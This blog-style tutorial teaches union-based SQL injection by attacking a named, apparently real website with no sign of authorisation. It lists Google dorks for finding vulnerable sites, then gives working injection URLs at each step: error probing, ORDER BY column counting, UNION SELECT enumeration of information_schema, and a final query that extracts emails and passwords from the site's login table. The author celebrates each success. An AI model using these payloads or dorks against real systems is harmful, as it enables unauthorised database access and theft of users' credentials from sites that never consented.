sql injection example

SQL injection example

Hello folks, in last article we saw how to use sqlmap for automated SQL injection if didn’t see click on the link and go through it so let’s talk about today’s article on SQL Injection Example

so, in today’s, I am going to explain you guys about union-based SQL injection so we go through SQL injection example let’s start today’s article

Step 1:

so first find SQL injection vulnerable website, we can use google dorks to find SQL injection vulnerable website, I am providing  some dorks you can use it

  • GOOGLE Dorks for SQL injection:

    • home.php?cat=
    • view_items.php?id=
    • product.php?sku=
    • main.php?id=

find vulnerable websites using above dorks (if you don’t know how to use dorks comment below I will definitely make an article on google dorks )

 

Step 2:

I got one vulnerable website, I assume that you also got one.

first, check whether the website is vulnerable with SQL injection or not by inserting a single quote ( ‘ ) at the end of the URL

  • http://www.crownglobalservices.com.pk/workers.php?profession=Driver’

If you get any kind of SQL error then it’s vulnerable to SQL injection

Hell yeah we got SQL injection vulnerable website

Hell yeah

  • Example:

sql injection

if you get an error similar to the above example then it’s vulnerable to SQL injection now  let’s start exploitation

Step 3:

now put ” — – ” at the end of the URL to balance the error, and now you can see the error is gone

  • Example:
    • http://www.crownglobalservices.com.pk/workers.php?profession=Driver’ — –

Step 4:

let’s move towards exploitation first we have to find the number of columns

to find the number of columns we have to use  ” order by

consider below example to know how to use it

and increase the value 1 in the above URL until it does not return an error

  • Example:
    • http://www.crownglobalservices.com.pk/workers.php?profession=Driver’ order by 1 — –
    • http://www.crownglobalservices.com.pk/workers.php?profession=Driver’ order by 2 — –
    • http://www.crownglobalservices.com.pk/workers.php?profession=Driver’ order by 3 — –
    • http://www.crownglobalservices.com.pk/workers.php?profession=Driver’ order by 22 — –

sqli column error

we get an error on the number 22 as shown above so finally we got a number of columns which is 21

Step 5:

so now let’s wind which column is vulnerable so we can use it for injection

for that, we have to use ” union select ” example shown below

so now remove order by from URL and put union select after that add 1-21 numbers which are present columns and press enter you will see all the vulnerable column numbers on the page

Example:

  • input
    • http://www.crownglobalservices.com.pk/workers.php?profession=Driver’ UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 — –
  • output
    • vulnerable columns

so here we got vulnerable columns which are the number 3 and 2 so now let’s try to inject from these columns

ohyeah

Step 6:

so now try to fetch table names from this website’s database using these vulnerable columns

we have vulnerable columns 2 and 3, so replace 2 with table_name and after the last number add ” from information_schema.tables ”

Example:

  • input:
    • http://www.crownglobalservices.com.pk/workers.php?profession=Driver’ UNION SELECT 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from information_schema.tables  — –
  • output:
    • sqli tables

we got following tables “contact, login, profession, profiles” so now let’s try to fetch column names from login table

Step 7:

so now we got table names, let’s fetch column names from login table for that make changes in URL as I am showing below

replace table_name with column_name and ” from information_schema.tables ” with ” from information_schema.column where table_name=’login’ ”

Example:

  • input:
    • http://www.crownglobalservices.com.pk/workers.php?profession=Driver’ UNION SELECT 1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from information_schema.columns where table_name=’login’– –
  • output:
    • columns sqli

so here we got column names id, name, email, pass now let’s try to fetch user logins from this table

Step 7:

now we got table_name , column_names so lets fetch data from table

replace column_name with concat(email,pass) and   ” from information_schema.column where table_name=’login’ ” with ” from login

Example:

  • input:

    • http://www.crownglobalservices.com.pk/workers.php?profession=Driver’ UNION SELECT 1,concat(email,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from login– –
  • output:

final step

that’s all we got login details from websites database if you have any question comment below i will definietly answer , please share this article with your friends and subscribe to notifications

 

One Comment

Add a Comment

Your email address will not be published. Required fields are marked *